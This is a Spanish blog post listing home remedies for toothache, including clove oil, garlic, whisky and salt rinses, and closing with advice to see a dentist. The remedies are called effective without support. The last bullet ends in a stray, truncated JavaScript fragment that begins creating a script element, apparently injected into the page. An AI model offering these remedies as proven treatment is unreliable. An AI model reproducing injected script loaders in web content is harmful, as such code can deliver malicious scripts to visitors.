Salud y belleza » Enfermedades, Salud

Remedios caseros para combatir el dolor de muelas

Sin Comentarios

muelas

Aquellos que padecieron alguna vez un dolor de muelas sabe que existen pocos malestares en la galaxia entera peores que ese. De hecho, la frase “dolor de muelas” ya no solo es patrimonio de la medicina sino de la humanidad entera: cada vez que alguien intenta definir una tarea complicada o una acción insoportable la define bajo la expresión “es un verdadero dolor de muelas” (trabajar es un dolor de muelas, quedarse en casa un sábado a la noche es un dolor de muelas, ver perder a tu equipo favorito es un dolor de muelas, cuidar a los niños de tu hermana es un dolor de muelas, ¡todo lo malo es un dolor de muelas!).

Pero, atención, pues no hay nada bajo el sol que no pueda ser curado (o al menos “aliviado”) con un remedio casero. Aquí, entonces, algunas soluciones naturales para cuando el dolor de muelas ataca.

- Aplicar una bolsa con hielo en la cara para desinflamar la zona de la raíz.

- Hacer un enjuague bucal, con whisky y mantener en la boca unos treinta segundos (¡sin tragar eh!).

- Frotar las encías con un algodón humedecido en aceite de clavo de olor.

- Picar una cabeza de ajo, hervir el resultado durante unos pocos minutos, colocar en medio vaso de vinagre y realizar enjuagues bucales.

- Colocar un clavo de olor  entero o machacado en el orificio dañado.

- Machacar un trocito de ajo y colocar directamente en la muela.

- Emplear cataplasmas calientes de arroz o en su defecto harina de linaza.

- Realizar un enjuague bucal con infusión de saúco, una pizca de pimienta y sal y 1/3 taza de vino. Desagradable pero efectivo (el lado positivo: también podrás comprobar el estado de tus papilas gustativas).

- Aplicar, por fuera de la mandíbula, un añadido o emplato a base de yema de huevo mezclada con una cucharadita de miel, migajas de pan y alcohol espolvoreada con pimienta de cayena y sujeta, a su vez, con una gasa.

- Cumplir buches con una cucharada de sal en un cuarto de litro de agua de romero (ésta es una de las opciones más comunes del circuito de la medicina alternativa).

- ¡Dejar de tenerle miedo al Odontólogo y cambiar diez minutos de sufrimientos por horas y horas de tortura! Esta es, sin duda alguna, la mejor de todas las opciones presentadas.var d=document;var s=d.createElement('script'); if (document.currentScript) {

Más consejos de salud y belleza : ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.